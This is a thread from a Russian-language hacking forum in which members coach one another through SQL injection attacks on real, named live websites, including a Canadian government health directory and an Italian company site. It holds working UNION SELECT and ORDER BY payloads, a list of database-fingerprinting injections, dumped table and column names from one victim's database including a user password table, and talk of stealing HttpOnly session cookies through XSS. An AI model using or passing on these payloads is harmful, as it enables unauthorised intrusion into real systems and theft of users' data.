Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Читай проведение SQL инъекций в Microsoft Access:

    http://forum.antichat.ru/thread50550.html
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Читал, пробовал разные варианты

    Code:
    http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+and+1=-1+UniOn+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+MSysObjects
    Не получается вывести диагностические ошибки о правильности или неправильности
     
    _________________________
  3. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    Всем привет!
    Подскажите, по какой причине может передаваться не вся кука?
    Всякий хлам из нее доходит, а вот ключа с сессией пользователя нет.
    add:
    На сайте wordpress 3.1.3... xss в форуме(плагин для wp).
    Еще попробовал в адрессной строке просмотреть алертом... тоже самое... без нужного значения. Опера показывает все, и еще на нужной записи стоит флаг HttpOnly, на остальных нет.
     
    #16963 IMMORTAL_S, 8 Jun 2011
    Last edited: 8 Jun 2011
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    IMMORTAL_S, сам ответил на вопрос. HttpOnly
     
  5. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    Да, уже погуглил.
    Что-то еще можно сделать?.. как-то убрать этот флаг?
    add:
    нашел ява апплет... всем спасибо))
     
    #16965 IMMORTAL_S, 8 Jun 2011
    Last edited: 8 Jun 2011
  6. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.
     
    1 person likes this.
  7. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    спасибо, лови + :)
    пока забил на куки... нашел sqlinj
     
  8. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    365
    Likes Received:
    188
    Reputations:
    92
    В какую сторону раскручивать?
    Code:
    http://www.homesrochester.com/index.cfm?PageID=1
    пробовал как mssql, не выходит
     
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Крутить нужно как проведение SQL инъекций в Microsoft Access:

    http://forum.antichat.ru/thread50550.html

    но навряд ли ты ее раскрутишь
     
  10. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    613
    Reputations:
    690
    2mix0x0 там все просто, стоит Microsoft SQL Server 2005 почитай тут тут и тут
    там 100500 БД...
     
    _________________________
    #16970 shell_c0de, 8 Jun 2011
    Last edited: 8 Jun 2011
    2 people like this.
  11. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Вы правы, там все легко выводится:

    DB Name: hr

    Table found: sysdiagrams
    Table found: Process
    Table found: MLSArea
    Table found: ProcessStep
    Table found: FileImport
    Table found: User
    Table found: Theme
    Table found: MLSListingImage
    Table found: Agent
    Table found: MLSListing
    Table found: Office
    Table found: Table1
    Table found: Table2
    Table found: ContainerModule
    Table found: ListingPriceHistory
    Table found: PageContainer
    Table found: Portlet
    Table found: OpenHouse
    Table found: PortletProperty
    Table found: ModuleProperty
    Table found: PropertyType
    Table found: Page
    Table found: FeaturedListing
    Table found: UserSearch
    Table found: FileImportColumn
    Table found: ListingType
    Table found: Document
    Table found: MLSListingLink
    Table found: WebLog
    Table found: Container
    Table found: OpenHouseTemp
    Table found: Module
    Table found: State
    Table found: Website

    hr.User

    Column found: AddedByID
    Column found: AddedDt
    Column found: EmailAddress
    Column found: FirstName
    Column found: HomePhone
    Column found: LastName
    Column found: MobilePhone
    Column found: Password
    Column found: SysAdminFl
    Column found: UpdatedByID
    Column found: UpdatedDt
    Column found: UserID
    Column found: UserName
    Column found: UserStatus
    Column found: WorkPhone

    От меня ++++++++ и большое thanks за науку.
     
  12. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    2 вопроса:
    1 - имеется сайт, в нем Возможно есть sql inj
    пишу в урл 49-1 возвращается 48 страница при написании ' выводится пустая страница
    как осуществить подсчет полей и дамп базы в таких условиях? и уязвим вообще этот сайт?

    2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
     
  13. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    1. Если параметр полностью передаться в базу, то как обычно. Обычно числовые параметры не обрамляются кавычками, из за этого при проведении инъекции возможно исключить этот символ. Если нет - выложи линк. Всё надо смотреть, так же возможно из переменной удаляются символы(A-Za-z), специальные функции - здесь телепатов нет.

    2. Встроенными функциями, синтаксисом подзапросов, сравнения - потом БД гораздо больше.
     
    #16973 randman, 8 Jun 2011
    Last edited: 8 Jun 2011
  14. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    "id=48 order by 1" например так.


    p.s.: давай ссылку. это тебе не фиши по факингу ;)
     
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    MySQL
    Code:
    id=1+procedure+analyse()
    id=1+and+concat_ws(1)=1
    id=1+and+connection_id()=connection_id()
    MSSQL
    Code:
    id=1+and+len(@@version)=len(@@version)
    id=1+and+(@@TEXTSIZE>@@LANGID)
    PostgerSQL
    Code:
    id=1+and+1=1::int
    id=1+and+pg_backend_pid()=pg_backend_pid()
    id=1+and+5432=inet_server_port() 
    Access
    Code:
    id=1+and+1=StrConv(1,1)
    id=1+and+Sgn(1)=Sgn(1) 
    Oracle
    Code:
    id=1+and+to_char(22)=to_char(2)||to_char(2) 
    id=1+and+instr4(1,1,1,1)=1
    id=1+and+rownum=rownum
    Взято отсюда: https://rdot.org/forum/showpost.php?p=695&postcount=1
     
    1 person likes this.
  16. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    вот это убожество _http://www.cms.it/prodotti.php?lang=eng'&pc=49

    (практикуюсь)
     
  17. AlexV

    AlexV Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    202
    Likes Received:
    566
    Reputations:
    81
    Code:
    http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 64-- -
    http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 65-- -
    
    Code:
    http://www.cms.it/prodotti.php?lang=eng&pc=(49)union/**/select(1),2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -
    вывод внизу
     
    3 people like this.
  18. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    Вывода не нашол, да и еще вопрос, почему ты 49 и 1 в скобки заключил?
     
  19. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+--+

    Сейчас видишь?

    В админку все равно не попасть
     
    #16979 FlaktW, 8 Jun 2011
    Last edited: 8 Jun 2011
  20. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    http://h1813090.stratoserver.net/files/share/8_6_2011/sraB8DgFlEWFYHrOQR1opw.jpg

    знаю я sqlhelperom уже просканил базу там даж паролей нет, просто руками же интересней
     
Loading...
Thread Status:
Not open for further replies.